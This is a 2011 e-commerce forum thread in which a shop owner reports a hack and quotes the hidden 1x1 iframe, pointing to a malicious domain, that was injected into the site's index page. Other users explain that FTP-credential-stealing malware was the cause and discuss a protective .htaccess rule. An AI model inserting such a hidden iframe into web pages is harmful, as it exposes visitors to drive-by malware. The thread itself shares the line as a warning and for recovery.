modelspecialist Posted May 16, 2011 Share Posted May 16, 2011 I've noticed today that I've had a security breach last night; suddenly my admin login wouldn't work anymore. My browser also stated I needed a plugin all of a sudden to be able to show the page correctly, which got my spidey senses tingling.. I opened up the index.html file that forwarded visitors to the shop's index site, and found that the following code was injected at the bottom; <iframe src="http://gratwall.vv.cc/showthread.php?t=80480463" width="1" height="1" frameborder="0"></iframe> I'm not sure what it does but I'm quite confident that it's the source of my problem. I'm reinstalling my shop (it's quite new so I don't have alot of work on it) but I still wanted to share this in case other people had the same problem. Link to comment Share on other sites More sharing options...
burt Posted May 16, 2011 Share Posted May 16, 2011 make sure that the backup that you are re-installing is also clean of the hack. After you have done the re-install, your shop will still be hackable, so you need to plug that hole. Link to comment Share on other sites More sharing options...
AntonPtitsyn Posted May 16, 2011 Share Posted May 16, 2011 I've noticed today that I've had a security breach last night; suddenly... Just a random passer by here, not related to oscommerce, (googled for "gratwall.vv.cc" and landed here), I had exactly the same thing on my sites today and had to reupload all infected index.* files. The problem is in malware on your PC stealing ftp account data from your ftp client and sending to attacker's site. I got my PC infected from a warez website yesterday with this script. Before restoring files you should be sure you found and deleted that malware, otherwise all files on your website will be infected again within several hours (or days). Also, don't forget to change ftp password to your hosting afterwards. Personally, I solved this problem by rewriting my entire disk C: from a backup disk image I keep at hand for such cases, afterwards changed ftp passwords and proceeded to restore original php and html files from backup folders. Link to comment Share on other sites More sharing options...
modelspecialist Posted May 17, 2011 Author Share Posted May 17, 2011 thanks for this info AntonPtisyn. I did indeed run a spyware check and my antivirus found a trojan horse in a file on my pc. I have no idea how it got there - anyway, it seems to work through the images folder; I found this in my htaccess file: <FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"> Order Deny,Allow Deny from all </FilesMatch> Link to comment Share on other sites More sharing options...
Guest Posted May 17, 2011 Share Posted May 17, 2011 thanks for this info AntonPtisyn. I did indeed run a spyware check and my antivirus found a trojan horse in a file on my pc. I have no idea how it got there - anyway, it seems to work through the images folder; I found this in my htaccess file:<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"> Order Deny,Allow Deny from all</FilesMatch> That is suppose to be the .htaccess for the images directory. It prevents files from being executed from that directory. Chris Link to comment Share on other sites More sharing options...
modelspecialist Posted May 18, 2011 Author Share Posted May 18, 2011 Ok thanks DunWeb.. I still need to get to know the shop's files a tad better and I'm not familiar with htaccess files (yet). Link to comment Share on other sites More sharing options...
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.